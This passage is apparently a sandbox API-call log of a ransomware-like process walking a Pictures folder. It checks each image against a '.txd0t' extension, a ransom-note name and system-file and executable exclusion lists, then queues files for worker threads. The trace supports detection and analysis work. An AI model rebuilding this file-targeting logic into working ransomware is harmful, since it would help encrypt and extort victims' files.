returned="C:\\Users\\FD1HVy\\Pictures\\kG7T_G4j-\\" [0076.150] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Pictures\\kG7T_G4j-\\", psz2="bwUCcMWGBF1Mcn_.gif", cchMax=1094 | out: psz1="C:\\Users\\FD1HVy\\Pictures\\kG7T_G4j-\\bwUCcMWGBF1Mcn_.gif") returned="C:\\Users\\FD1HVy\\Pictures\\kG7T_G4j-\\bwUCcMWGBF1Mcn_.gif" [0076.150] PathFindExtensionW (pszPath="bwUCcMWGBF1Mcn_.gif") returned=".gif" [0076.151] StrCmpW (psz1=".gif", psz2=".txd0t") returned -1 [0076.151] StrCmpIW (psz1="bwUCcMWGBF1Mcn_.gif", psz2="bootsect.bak") returned 1 [0076.151] StrCmpIW (psz1="bwUCcMWGBF1Mcn_.gif", psz2="iconcache.db") returned -1 [0076.151] StrCmpIW (psz1="bwUCcMWGBF1Mcn_.gif", psz2="thumbs.db") returned -1 [0076.151] StrCmpIW (psz1="bwUCcMWGBF1Mcn_.gif", psz2=" ransomware ") returned 1 [0076.151] StrCmpIW (psz1="bwUCcMWGBF1Mcn_.gif", psz2=" ransom ") returned 1 [0076.151] StrCmpIW (psz1="bwUCcMWGBF1Mcn_.gif", psz2="debug.txt") returned -1 [0076.151] StrCmpIW (psz1="bwUCcMWGBF1Mcn_.gif", psz2="boot.ini") returned 1 [0076.151] StrCmpIW (psz1="bwUCcMWGBF1Mcn_.gif", psz2="desktop.ini") returned -1 [0076.151] StrCmpIW (psz1="bwUCcMWGBF1Mcn_.gif", psz2="autorun.inf") returned 1 [0076.151] StrCmpIW (psz1="bwUCcMWGBF1Mcn_.gif", psz2="ntuser.dat") returned -1 [0076.151] StrCmpIW (psz1="bwUCcMWGBF1Mcn_.gif", psz2="ntldr") returned -1 [0076.151] StrCmpIW (psz1="bwUCcMWGBF1Mcn_.gif", psz2="ntdetect.com") returned -1 [0076.151] StrCmpIW (psz1="bwUCcMWGBF1Mcn_.gif", psz2="bootfont.bin") returned 1 [0076.151] StrCmpIW (psz1="bwUCcMWGBF1Mcn_.gif", psz2="!TXDOT_READ_ME!.txt") returned 1 [0076.151] PathFindExtensionW (pszPath="bwUCcMWGBF1Mcn_.gif") returned=".gif" [0076.151] StrStrIW (lpFirst=".ani|.cab|.cpl|.cur|.diagcab|.diagpkg|.dll|.drv|.hlp|.icl|.icns|.ico|.iso|.ics|.lnk|.idx|.mod|.mpa|.msc|.msp|.msstyles|.msu|.nomedia|.ocx|.prf|.rtp|.scr|.shs|.spl|.sys|.theme|.themepack|.exe|.bat|.cmd|.url|.mui", lpSrch=".gif") returned 0x0 [0076.151] FileTimeToSystemTime (in: lpFileTime=0x552f19c, lpSystemTime=0x552f188 | out: lpSystemTime=0x552f188) returned 1 [0076.151] SystemTimeToTzSpecificLocalTime (in: lpTimeZoneInformation=0x0, lpUniversalTime=0x552f188, lpLocalTime=0x552f158 | out: lpLocalTime=0x552f158) returned 1 [0076.151] WaitForMultipleObjects (nCount=0x4, lpHandles=0xe9f390*=0x3f8, bWaitAll=0, dwMilliseconds=0xffffffff) returned 0x2 [0076.151] StrCpyW (in: psz1=0xeafb88, psz2="\\\\?\\" | out: psz1="\\\\?\\") returned="\\\\?\\" [0076.151] StrNCatW (in: psz1="\\\\?\\", psz2="C:\\Users\\FD1HVy\\Pictures\\kG7T_G4j-\\bwUCcMWGBF1Mcn_.gif", cchMax=32000 | out: psz1="\\\\?\\C:\\Users\\FD1HVy\\Pictures\\kG7T_G4j-\\bwUCcMWGBF1Mcn_.gif") returned="\\\\?\\C:\\Users\\FD1HVy\\Pictures\\kG7T_G4j-\\bwUCcMWGBF1Mcn_.gif" [0076.151] SetEvent (hEvent=0x410) returned 1 [0076.151] FindNextFileW (in: hFindFile=0xec25f0, lpFindFileData=0x552f198 | out: lpFindFileData=0x552f198*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2ee86190, ftCreationTime.dwHighDateTime=0x1d5e585, ftLastAccessTime.dwLowDateTime=0x14aa8600, ftLastAccessTime.dwHighDateTime=0x1d5ec56, ftLastWriteTime.dwLowDateTime=0x14aa8600, ftLastWriteTime.dwHighDateTime=0x1d5ec56, nFileSizeHigh=0x0, nFileSizeLow=0x7f86, dwReserved0=0x740e99, dwReserved1=0x0, cFileName="cBmZZ5bX2Jx3bJhbUv.bmp", cAlternateFileName="CBMZZ5~1.BMP")) returned 1 [0076.151] StrCmpW (psz1="cBmZZ5bX2Jx3bJhbUv.bmp", psz2=".") returned 1 [0076.151] StrCmpW (psz1="cBmZZ5bX2Jx3bJhbUv.bmp", psz2="..") returned 1 [0076.151] StrCpyNW (in: psz1=0xed31f0, psz2="C:\\Users\\FD1HVy\\Pictures\\kG7T_G4j-", cchMax=1094 | out: psz1="C:\\Users\\FD1HVy\\Pictures\\kG7T_G4j-") returned="C:\\Users\\FD1HVy\\Pictures\\kG7T_G4j-" [0076.151] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Pictures\\kG7T_G4j-", psz2="\\", cchMax=1094 | out: psz1="C:\\Users\\FD1HVy\\Pictures\\kG7T_G4j-\\") returned="C:\\Users\\FD1HVy\\Pictures\\kG7T_G4j-\\" [0076.151] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Pictures\\kG7T_G4j-\\", psz2="cBmZZ5bX2Jx3bJhbUv.bmp", cchMax=1094 | out: psz1="C:\\Users\\FD1HVy\\Pictures\\kG7T_G4j-\\cBmZZ5bX2Jx3bJhbUv.bmp") returned="C:\\Users\\FD1HVy\\Pictures\\kG7T_G4j-\\cBmZZ5bX2Jx3bJhbUv.bmp" [0076.151] PathFindExtensionW (pszPath="cBmZZ5bX2Jx3bJhbUv.bmp") returned=".bmp" [0076.151] StrCmpW (psz1=".bmp", psz2=".txd0t") returned -1 [0076.152] StrCmpIW (psz1="cBmZZ5bX2Jx3bJhbUv.bmp", psz2="bootsect.bak") returned 1 [0076.152] StrCmpIW (psz1="cBmZZ5bX2Jx3bJhbUv.bmp", psz2="iconcache.db") returned -1 [0076.152] StrCmpIW (psz1="cBmZZ5bX2Jx3bJhbUv.bmp", psz2="thumbs.db") returned -1 [0076.152] StrCmpIW (psz1="cBmZZ5bX2Jx3bJhbUv.bmp", psz2=" ransomware ") returned 1 [0076.152] StrCmpIW (psz1="cBmZZ5bX2Jx3bJhbUv.bmp", psz2=" ransom ") returned 1 [0076.152] StrCmpIW (psz1="cBmZZ5bX2Jx3bJhbUv.bmp", psz2="debug.txt") returned -1 [0076.152] StrCmpIW (psz1="cBmZZ5bX2Jx3bJhbUv.bmp", psz2="boot.ini") returned 1 [0076.152] StrCmpIW (psz1="cBmZZ5bX2Jx3bJhbUv.bmp", psz2="desktop.ini") returned -1 [0076.152] StrCmpIW (psz1="cBmZZ5bX2Jx3bJhbUv.bmp", psz2="autorun.inf") returned 1 [0076.152] StrCmpIW (psz1="cBmZZ5bX2Jx3bJhbUv.bmp", psz2="ntuser.dat") returned -1 [0076.152] StrCmpIW (psz1="cBmZZ5bX2Jx3bJhbUv.bmp", psz2="ntldr") returned -1 [0076.152] StrCmpIW (psz1="cBmZZ5bX2Jx3bJhbUv.bmp", psz2="ntdetect.com") returned -1 [0076.152] StrCmpIW (psz1="cBmZZ5bX2Jx3bJhbUv.bmp", psz2="bootfont.bin") returned 1 [0076.152] StrCmpIW (psz1="cBmZZ5bX2Jx3bJhbUv.bmp", psz2="!TXDOT_READ_ME!.txt") returned 1 [0076.152] PathFindExtensionW (pszPath="cBmZZ5bX2Jx3bJhbUv.bmp") returned=".bmp" [0076.152] StrStrIW (lpFirst=".ani|.cab|.cpl|.cur|.diagcab|.diagpkg|.dll|.drv|.hlp|.icl|.icns|.ico|.iso|.ics|.lnk|.idx|.mod|.mpa|.msc|.msp|.msstyles|.msu|.nomedia|.ocx|.prf|.rtp|.scr|.shs|.spl|.sys|.theme|.themepack|.exe|.bat|.cmd|.url|.mui", lpSrch=".bmp") returned 0x0 [0076.152] FileTimeToSystemTime (in: lpFileTime=0x552f19c, lpSystemTime=0x552f188 | out: lpSystemTime=0x552f188) returned 1 [0076.152] SystemTimeToTzSpecificLocalTime (in: lpTimeZoneInformation=0x0, lpUniversalTime=0x552f188, lpLocalTime=0x552f158 | out: lpLocalTime=0x552f158) returned 1 [0076.152] WaitForMultipleObjects (nCount=0x4, lpHandles=0xe9f390*=0x3f8, bWaitAll=0, dwMilliseconds=0xffffffff) returned 0x1 [0076.168] StrCpyW (in: psz1=0xea7e00, psz2="\\\\?\\" | out: psz1="\\\\?\\") returned="\\\\?\\" [0076.168] StrNCatW (in: psz1="\\\\?\\", psz2="C:\\Users\\FD1HVy\\Pictures\\kG7T_G4j-\\cBmZZ5bX2Jx3bJhbUv.bmp", cchMax=32000 | out: psz1="\\\\?\\C:\\Users\\FD1HVy\\Pictures\\kG7T_G4j-\\cBmZZ5bX2Jx3bJhbUv.bmp") returned="\\\\?\\C:\\Users\\FD1HVy\\Pictures\\kG7T_G4j-\\cBmZZ5bX2Jx3bJhbUv.bmp" [0076.168] SetEvent (hEvent=0x408) returned 1 [0076.168] FindNextFileW (in: hFindFile=0xec25f0, lpFindFileData=0x552f198 | out: lpFindFileData=0x552f198*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x309a2510, ftCreationTime.dwHighDateTime=0x1d5eabb, ftLastAccessTime.dwLowDateTime=0x655909d0, ftLastAccessTime.dwHighDateTime=0x1d5e9c9, ftLastWriteTime.dwLowDateTime=0x655909d0, ftLastWriteTime.dwHighDateTime=0x1d5e9c9, nFileSizeHigh=0x0, nFileSizeLow=0x53ff, dwReserved0=0x740e99, dwReserved1=0x0, cFileName="e0RUl3aLEh6brT_yeUb0.jpg", cAlternateFileName="E0RUL3~1.JPG")) returned 1 [0076.168] StrCmpW (psz1="e0RUl3aLEh6brT_yeUb0.jpg", psz2=".") returned 1 [0076.168] StrCmpW (psz1="e0RUl3aLEh6brT_yeUb0.jpg", psz2="..") returned 1 [0076.168] StrCpyNW (in: psz1=0xed31f0, psz2="C:\\Users\\FD1HVy\\Pictures\\kG7T_G4j-", cchMax=1094 | out: psz1="C:\\Users\\FD1HVy\\Pictures\\kG7T_G4j-") returned="C:\\Users\\FD1HVy\\Pictures\\kG7T_G4j-" [0076.168] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Pictures\\kG7T_G4j-", psz2="\\", cchMax=1094 | out: psz1="C:\\Users\\FD1HVy\\Pictures\\kG7T_G4j-\\") returned="C:\\Users\\FD1HVy\\Pictures\\kG7T_G4j-\\" [0076.168] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Pictures\\kG7T_G4j-\\", psz2="e0RUl3aLEh6brT_yeUb0.jpg", cchMax=1094 | out: psz1="C:\\Users\\FD1HVy\\Pictures\\kG7T_G4j-\\e0RUl3aLEh6brT_yeUb0.jpg") returned="C:\\Users\\FD1HVy\\Pictures\\kG7T_G4j-\\e0RUl3aLEh6brT_yeUb0.jpg" [0076.168] PathFindExtensionW (pszPath="e0RUl3aLEh6brT_yeUb0.jpg") returned=".jpg" [0076.168] StrCmpW (psz1=".jpg", psz2=".txd0t") returned -1 [0076.168] StrCmpIW (psz1="e0RUl3aLEh6brT_yeUb0.jpg", psz2="bootsect.bak") returned 1 [0076.168] StrCmpIW (psz1="e0RUl3aLEh6brT_yeUb0.jpg", psz2="iconcache.db") returned -1 [0076.168] StrCmpIW (psz1="e0RUl3aLEh6brT_yeUb0.jpg", psz2="thumbs.db") returned -1 [0076.168] StrCmpIW (psz1="e0RUl3aLEh6brT_yeUb0.jpg", psz2=" ransomware ") returned 1 [0076.168] StrCmpIW (psz1="e0RUl3aLEh6brT_yeUb0.jpg", psz2=" ransom ") returned 1 [0076.168] StrCmpIW (psz1="e0RUl3aLEh6brT_yeUb0.jpg", psz2="debug.txt") returned 1 [0076.168] StrCmpIW (psz1="e0RUl3aLEh6brT_yeUb0.jpg", psz2="boot.ini") returned 1 [0076.168] StrCmpIW (psz1="e0RUl3aLEh6brT_yeUb0.jpg", psz2="desktop.ini") returned 1 [0076.168] StrCmpIW (psz1="e0RUl3aLEh6brT_yeUb0.jpg", psz2="autorun.inf") returned 1 [0076.169] StrCmpIW (psz1="e0RUl3aLEh6brT_yeUb0.jpg", psz2="ntuser.dat") returned -1 [0076.169] StrCmpIW (psz1="e0RUl3aLEh6brT_yeUb0.jpg", psz2="ntldr") returned -1 [0076.169] StrCmpIW (psz1="e0RUl3aLEh6brT_yeUb0.jpg", psz2="ntdetect.com") returned -1 [0076.169] StrCmpIW (psz1="e0RUl3aLEh6brT_yeUb0.jpg", psz2="bootfont.bin") returned 1 [0076.169] StrCmpIW (psz1="e0RUl3aLEh6brT_yeUb0.jpg", psz2="!TXDOT_READ_ME!.txt") returned 1 [0076.169] PathFindExtensionW (pszPath="e0RUl3aLEh6brT_yeUb0.jpg") returned=".jpg" [0076.169] StrStrIW (lpFirst=".ani|.cab|.cpl|.cur|.diagcab|.diagpkg|.dll|.drv|.hlp|.icl|.icns|.ico|.iso|.ics|.lnk|.idx|.mod|.mpa|.msc|.msp|.msstyles|.msu|.nomedia|.ocx|.prf|.rtp|.scr|.shs|.spl|.sys|.theme|.themepack|.exe|.bat|.cmd|.url|.mui", lpSrch=".jpg") returned 0x0 [0076.169] FileTimeToSystemTime (in: lpFileTime=0x552f19c, lpSystemTime=0x552f188 | out: lpSystemTime=0x552f188) returned 1 [0076.169] SystemTimeToTzSpecificLocalTime (in: lpTimeZoneInformation=0x0, lpUniversalTime=0x552f188, lpLocalTime=0x552f158 | out: lpLocalTime=0x552f158) returned 1 [0076.169] WaitForMultipleObjects (nCount=0x4, lpHandles=0xe9f390*=0x3f8, bWaitAll=0, dwMilliseconds=0xffffffff) returned 0x2 [0076.193] StrCpyW (in: psz1=0xeafb88, psz2="\\\\?\\" | out: psz1="\\\\?\\") returned="\\\\?\\" [0076.193] StrNCatW (in: psz1="\\\\?\\", psz2="C:\\Users\\FD1HVy\\Pictures\\kG7T_G4j-\\e0RUl3aLEh6brT_yeUb0.jpg", cchMax=32000 | out: psz1="\\\\?\\C:\\Users\\FD1HVy\\Pictures\\kG7T_G4j-\\e0RUl3aLEh6brT_yeUb0.jpg") returned="\\\\?\\C:\\Users\\FD1HVy\\Pictures\\kG7T_G4j-\\e0RUl3aLEh6brT_yeUb0.jpg" [0076.193] SetEvent (hEvent=0x410) returned 1 [0076.193] FindNextFileW (in: hFindFile=0xec25f0, lpFindFileData=0x552f198 | out: lpFindFileData=0x552f198*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x91351d40, ftCreationTime.dwHighDateTime=0x1d5e178, ftLastAccessTime.dwLowDateTime=0x3aeb9590, ftLastAccessTime.dwHighDateTime=0x1d5eb4b, ftLastWriteTime.dwLowDateTime=0x3aeb9590, ftLastWriteTime.dwHighDateTime=0x1d5eb4b, nFileSizeHigh=0x0, nFileSizeLow=0x11ed8, dwReserved0=0x740e99, dwReserved1=0x0, cFileName="EVRLdIxDOIvB-Fc9_h.gif", cAlternateFileName="EVRLDI~1.GIF")) returned 1 [0076.194] StrCmpW (psz1="EVRLdIxDOIvB-Fc9_h.gif", psz2=".") returned 1 [0076.194] StrCmpW (psz1="EVRLdIxDOIvB-Fc9_h.gif", psz2="..") returned 1 [0076.194] StrCpyNW (in: psz1=0xed31f0, psz2="C:\\Users\\FD1HVy\\Pictures\\kG7T_G4j-", cchMax=1094 | out: psz1="C:\\Users\\FD1HVy\\Pictures\\kG7T_G4j-") returned="C:\\Users\\FD1HVy\\Pictures\\kG7T_G4j-" [0076.194] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Pictures\\kG7T_G4j-", psz2="\\", cchMax=1094 | out: psz1="C:\\Users\\FD1HVy\\Pictures\\kG7T_G4j-\\") returned="C:\\Users\\FD1HVy\\Pictures\\kG7T_G4j-\\" [0076.194] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Pictures\\kG7T_G4j-\\", psz2="EVRLdIxDOIvB-Fc9_h.gif", cchMax=1094 | out: psz1="C:\\Users\\FD1HVy\\Pictures\\kG7T_G4j-\\EVRLdIxDOIvB-Fc9_h.gif") returned="C:\\Users\\FD1HVy\\Pictures\\kG7T_G4j-\\EVRLdIxDOIvB-Fc9_h.gif" [0076.194] PathFindExtensionW (pszPath="EVRLdIxDOIvB-Fc9_h.gif") returned=".gif" [0076.194] StrCmpW (psz1=".gif", psz2=".txd0t") returned -1 [0076.194] StrCmpIW (psz1="EVRLdIxDOIvB-Fc9_h.gif", psz2="bootsect.bak") returned 1 [0076.194] StrCmpIW (psz1="EVRLdIxDOIvB-Fc9_h.gif", psz2="iconcache.db") returned -1 [0076.194] StrCmpIW (psz1="EVRLdIxDOIvB-Fc9_h.gif", psz2="thumbs.db") returned -1 [0076.194] StrCmpIW (psz1="EVRLdIxDOIvB-Fc9_h.gif", psz2=" ransomware ") returned 1 [0076.194] StrCmpIW (psz1="EVRLdIxDOIvB-Fc9_h.gif", psz2=" ransom ") returned 1 [0076.194] StrCmpIW (psz1="EVRLdIxDOIvB-Fc9_h.gif", psz2="debug.txt") returned 1 [0076.194] StrCmpIW (psz1="EVRLdIxDOIvB-Fc9_h.gif", psz2="boot.ini") returned 1 [0076.194] StrCmpIW (psz1="EVRLdIxDOIvB-Fc9_h.gif", psz2="desktop.ini") returned 1 [0076.194] StrCmpIW (psz1="EVRLdIxDOIvB-Fc9_h.gif", psz2="autorun.inf") returned 1 [0076.194] StrCmpIW (psz1="EVRLdIxDOIvB-Fc9_h.gif", psz2="ntuser.dat") returned -1 [0076.194] StrCmpIW (psz1="EVRLdIxDOIvB-Fc9_h.gif", psz2="ntldr") returned -1 [0076.194] StrCmpIW (psz1="EVRLdIxDOIvB-Fc9_h.gif", psz2="ntdetect.com") returned -1 [0076.194] StrCmpIW (psz1="EVRLdIxDOIvB-Fc9_h.gif", psz2="bootfont.bin") returned 1 [0076.194] StrCmpIW (psz1="EVRLdIxDOIvB-Fc9_h.gif", psz2="!TXDOT_READ_ME!.txt") returned 1 [0076.194] PathFindExtensionW (pszPath="EVRLdIxDOIvB-Fc9_h.gif") returned=".gif" [0076.194] StrStrIW (lpFirst=".ani|.cab|.cpl|.cur|.diagcab|.diagpkg|.dll|.drv|.hlp|.icl|.icns|.ico|.iso|.ics|.lnk|.idx|.mod|.mpa|.msc|.msp|.msstyles|.msu|.nomedia|.ocx|.prf|.rtp|.scr|.shs|.spl|.sys|.theme|.themepack|.exe|.bat|.cmd|.url|.mui", lpSrch=".gif") returned 0x0 [0076.194] FileTimeToSystemTime (in: lpFileTime=0x552f19c, lpSystemTime=0x552f188 | out: lpSystemTime=0x552f188) returned 1 [0076.194] SystemTimeToTzSpecificLocalTime (in: lpTimeZoneInformation=0x0, lpUniversalTime=0x552f188, lpLocalTime=0x552f158 | out: lpLocalTime=0x552f158) returned 1 [0076.194] WaitForMultipleObjects (nCount=0x4, lpHandles=0xe9f390*=0x3f8, bWaitAll=0, dwMilliseconds=0xffffffff) returned 0x3 [0076.202] StrCpyW (in: psz1=0xeb7910, psz2="\\\\?\\" | out: psz1="\\\\?\\") returned="\\\\?\\" [0076.202] StrNCatW (in: psz1="\\\\?\\", psz2="C:\\Users\\FD1HVy\\Pictures\\kG7T_G4j-\\EVRLdIxDOIvB-Fc9_h.gif", cchMax=32000 | out: psz1="\\\\?\\C:\\Users\\FD1HVy\\Pictures\\kG7T_G4j-\\EVRLdIxDOIvB-Fc9_h.gif") returned="\\\\?\\C:\\Users\\FD1HVy\\Pictures\\kG7T_G4j-\\EVRLdIxDOIvB-Fc9_h.gif" [0076.202] SetEvent (hEvent=0x418) returned 1 [0076.202] FindNextFileW (in: hFindFile=0xec25f0, lpFindFileData=0x552f198 | out: lpFindFileData=0x552f198*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x85808c0, ftCreationTime.dwHighDateTime=0x1d5ec9f, ftLastAccessTime.dwLowDateTime=0xbac47e50, ftLastAccessTime.dwHighDateTime=0x1d5e3ab, ftLastWriteTime.dwLowDateTime=0xbac47e50, ftLastWriteTime.dwHighDateTime=0x1d5e3ab, nFileSizeHigh=0x0, nFileSizeLow=0x18d51, dwReserved0=0x740e99, dwReserved1=0x0, cFileName="iRuE37I4VoTmYoZQwpA.png", cAlternateFileName="IRUE37~1.PNG")) returned 1 [0076.202] StrCmpW (psz1="iRuE37I4VoTmYoZQwpA.png", psz2=".") returned 1 [0076.202] StrCmpW (psz1="iRuE37I4VoTmYoZQwpA.png", psz2="..") returned 1 [0076.202] StrCpyNW (in: psz1=0xed31f0, psz2="C:\\Users\\FD1HVy\\Pictures\\kG7T_G4j-", cchMax=1094 | out: psz1="C:\\Users\\FD1HVy\\Pictures\\kG7T_G4j-") returned="C:\\Users\\FD1HVy\\Pictures\\kG7T_G4j-" [0076.202] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Pictures\\kG7T_G4j-", psz2="\\", cchMax=1094 | out: psz1="C:\\Users\\FD1HVy\\Pictures\\kG7T_G4j-\\") returned="C:\\Users\\FD1HVy\\Pictures\\kG7T_G4j-\\" [0076.202] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Pictures\\kG7T_G4j-\\", psz2="iRuE37I4VoTmYoZQwpA.png", cchMax=1094 | out: psz1="C:\\Users\\FD1HVy\\Pictures\\kG7T_G4j-\\iRuE37I4VoTmYoZQwpA.png") returned="C:\\Users\\FD1HVy\\Pictures\\kG7T_G4j-\\iRuE37I4VoTmYoZQwpA.png" [0076.202] PathFindExtensionW (pszPath="iRuE37I4VoTmYoZQwpA.png") returned=".png" [0076.202] StrCmpW (psz1=".png", psz2=".txd0t") returned -1 [0076.202] StrCmpIW (psz1="iRuE37I4VoTmYoZQwpA.png", psz2="bootsect.bak") returned 1 [0076.202] StrCmpIW (psz1="iRuE37I4VoTmYoZQwpA.png", psz2="iconcache.db") returned 1 [0076.203] StrCmpIW (psz1="iRuE37I4VoTmYoZQwpA.png", psz2="thumbs.db") returned -1 [0076.203] StrCmpIW (psz1="iRuE37I4VoTmYoZQwpA.png", psz2=" ransomware ") returned 1 [0076.203] StrCmpIW (psz1="iRuE37I4VoTmYoZQwpA.png", psz2=" ransom ") returned 1 [0076.203] StrCmpIW (psz1="iRuE37I4VoTmYoZQwpA.png", psz2="debug.txt") returned 1 [0076.203] StrCmpIW (psz1="iRuE37I4VoTmYoZQwpA.png", psz2="boot.ini") returned 1 [0076.203] StrCmpIW (psz1="iRuE37I4VoTmYoZQwpA.png", psz2="desktop.ini") returned 1 [0076.203] StrCmpIW (psz1="iRuE37I4VoTmYoZQwpA.png", psz2="autorun.inf") returned 1 [0076.203] StrCmpIW (psz1="iRuE37I4VoTmYoZQwpA.png", psz2="ntuser.dat") returned -1 [0076.203] StrCmpIW (psz1="iRuE37I4VoTmYoZQwpA.png", psz2="ntldr") returned -1 [0076.203] StrCmpIW (psz1="iRuE37I4VoTmYoZQwpA.png", psz2="ntdetect.com") returned -1 [0076.203] StrCmpIW (psz1="iRuE37I4VoTmYoZQwpA.png", psz2="bootfont.bin") returned 1 [0076.203] StrCmpIW (psz1="iRuE37I4VoTmYoZQwpA.png", psz2="!TXDOT_READ_ME!.txt") returned 1 [0076.203] PathFindExtensionW (pszPath="iRuE37I4VoTmYoZQwpA.png") returned=".png" [0076.203] StrStrIW (lpFirst=".ani|.cab|.cpl|.cur|.diagcab|.diagpkg|.dll|.drv|.hlp|.icl|.icns|.ico|.iso|.ics|.lnk|.idx|.mod|.mpa|.msc|.msp|.msstyles|.msu|.nomedia|.ocx|.prf|.rtp|.scr|.shs|.spl|.sys|.theme|.themepack|.exe|.bat|.cmd|.url|.mui", lpSrch=".png") returned 0x0 [0076.203] FileTimeToSystemTime (in: lpFileTime=0x552f19c, lpSystemTime=0x552f188 | out: lpSystemTime=0x552f188) returned 1 [0076.203] SystemTimeToTzSpecificLocalTime (in: lpTimeZoneInformation=0x0, lpUniversalTime=0x552f188, lpLocalTime=0x552f158 | out: lpLocalTime=0x552f158) returned 1 [0076.203] WaitForMultipleObjects (nCount=0x4, lpHandles=0xe9f390*=0x3f8, bWaitAll=0, dwMilliseconds=0xffffffff) returned 0x2 [0076.211] StrCpyW (in: psz1=0xeafb88, psz2="\\\\?\\" | out: psz1="\\\\?\\") returned="\\\\?\\" [0076.211] StrNCatW (in: psz1="\\\\?\\", psz2="C:\\Users\\FD1HVy\\Pictures\\kG7T_G4j-\\iRuE37I4VoTmYoZQwpA.png", cchMax=32000 | out: psz1="\\\\?\\C:\\Users\\FD1HVy\\Pictures\\kG7T_G4j-\\iRuE37I4VoTmYoZQwpA.png") returned="\\\\?\\C:\\Users\\FD1HVy\\Pictures\\kG7T_G4j-\\iRuE37I4VoTmYoZQwpA.png" [0076.211] SetEvent (hEvent=0x410) returned 1 [0076.211] FindNextFileW (in: hFindFile=0xec25f0, lpFindFileData=0x552f198 | out: lpFindFileData=0x552f198*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4ee270, ftCreationTime.dwHighDateTime=0x1d5efb0, ftLastAccessTime.dwLowDateTime=0x85fba70, ftLastAccessTime.dwHighDateTime=0x1d5e9ed, ftLastWriteTime.dwLowDateTime=0x85fba70, ftLastWriteTime.dwHighDateTime=0x1d5e9ed, nFileSizeHigh=0x0, nFileSizeLow=0x11d46, dwReserved0=0x740e99, dwReserved1=0x0, cFileName="Kiw0vwA10s0.png", cAlternateFileName="KIW0VW~1.PNG")) returned 1 [0076.211] StrCmpW (psz1="Kiw0vwA10s0.png", psz2=".") returned 1 [0076.211] StrCmpW (psz1="Kiw0vwA10s0.png", psz2="..") returned 1 [0076.211] StrCpyNW (in: psz1=0xed31f0, psz2="C:\\Users\\FD1HVy\\Pictures\\kG7T_G4j-", cchMax=1094 | out: psz1="C:\\Users\\FD1HVy\\Pictures\\kG7T_G4j-") returned="C:\\Users\\FD1HVy\\Pictures\\kG7T_G4j-" [0076.211] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Pictures\\kG7T_G4j-", psz2="\\", cchMax=1094 | out: psz1="C:\\Users\\FD1HVy\\Pictures\\kG7T_G4j-\\") returned="C:\\Users\\FD1HVy\\Pictures\\kG7T_G4j-\\" [0076.211] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Pictures\\kG7T_G4j-\\", psz2="Kiw0vwA10s0.png", cchMax=1094 | out: psz1="C:\\Users\\FD1HVy\\Pictures\\kG7T_G4j-\\Kiw0vwA10s0.png") returned="C:\\Users\\FD1HVy\\Pictures\\kG7T_G4j-\\Kiw0vwA10s0.png" [0076.211] PathFindExtensionW (pszPath="Kiw0vwA10s0.png") returned=".png" [0076.211] StrCmpW (psz1=".png", psz2=".txd0t") returned -1 [0076.212] StrCmpIW (psz1="Kiw0vwA10s0.png", psz2="bootsect.bak") returned 1 [0076.212] StrCmpIW (psz1="Kiw0vwA10s0.png", psz2="iconcache.db") returned 1 [0076.212] StrCmpIW (psz1="Kiw0vwA10s0.png", psz2="thumbs.db") returned -1 [0076.212] StrCmpIW (psz1="Kiw0vwA10s0.png", psz2=" ransomware ") returned 1 [0076.212] StrCmpIW (psz1="Kiw0vwA10s0.png", psz2=" ransom ") returned 1 [0076.212] StrCmpIW (psz1="Kiw0vwA10s0.png", psz2="debug.txt") returned 1 [0076.212] StrCmpIW (psz1="Kiw0vwA10s0.png", psz2="boot.ini") returned 1 [0076.212] StrCmpIW (psz1="Kiw0vwA10s0.png", psz2="desktop.ini") returned 1 [0076.212] StrCmpIW (psz1="Kiw0vwA10s0.png", psz2="autorun.inf") returned 1 [0076.212] StrCmpIW (psz1="Kiw0vwA10s0.png", psz2="ntuser.dat") returned -1 [0076.212] StrCmpIW (psz1="Kiw0vwA10s0.png", psz2="ntldr") returned -1 [0076.212] StrCmpIW (psz1="Kiw0vwA10s0.png", psz2="ntdetect.com") returned -1 [0076.212] StrCmpIW (psz1="Kiw0vwA10s0.png", psz2="bootfont.bin") returned 1 [0076.212] StrCmpIW (psz1="Kiw0vwA10s0.png", psz2="!TXDOT_READ_ME!.txt") returned 1 [0076.212] PathFindExtensionW (pszPath="Kiw0vwA10s0.png") returned=".png" [0076.212] StrStrIW (lpFirst=".ani|.cab|.cpl|.cur|.diagcab|.diagpkg|.dll|.drv|.hlp|.icl|.icns|.ico|.iso|.ics|.lnk|.idx|.mod|.mpa|.msc|.msp|.msstyles|.msu|.nomedia|.ocx|.prf|.rtp|.scr|.shs|.spl|.sys|.theme|.themepack|.exe|.bat|.cmd|.url|.mui", lpSrch=".png") returned 0x0 [0076.212] FileTimeToSystemTime (in: lpFileTime=0x552f19c, lpSystemTime=0x552f188 | out: lpSystemTime=0x552f188) returned 1 [0076.212] SystemTimeToTzSpecificLocalTime (in: lpTimeZoneInformation=0x0, lpUniversalTime=0x552f188, lpLocalTime=0x552f158 | out: lpLocalTime=0x552f158) returned 1 [0076.212] WaitForMultipleObjects (nCount=0x4, lpHandles=0xe9f390*=0x3f8, bWaitAll=0, dwMilliseconds=0xffffffff) returned 0x3 [0076.220] StrCpyW (in: psz1=0xeb7910, psz2="\\\\?\\" | out: psz1="\\\\?\\") returned="\\\\?\\" [0076.221] StrNCatW (in: psz1="\\\\?\\", psz2="C:\\Users\\FD1HVy\\Pictures\\kG7T_G4j-\\Kiw0vwA10s0.png", cchMax=32000 | out: psz1="\\\\?\\C:\\Users\\FD1HVy\\Pictures\\kG7T_G4j-\\Kiw0vwA10s0.png") returned="\\\\?\\C:\\Users\\FD1HVy\\Pictures\\kG7T_G4j-\\Kiw0vwA10s0.png" [0076.221] SetEvent (hEvent=0x418) returned 1 [0076.221] FindNextFileW (in: hFindFile=0xec25f0, lpFindFileData=0x552f198 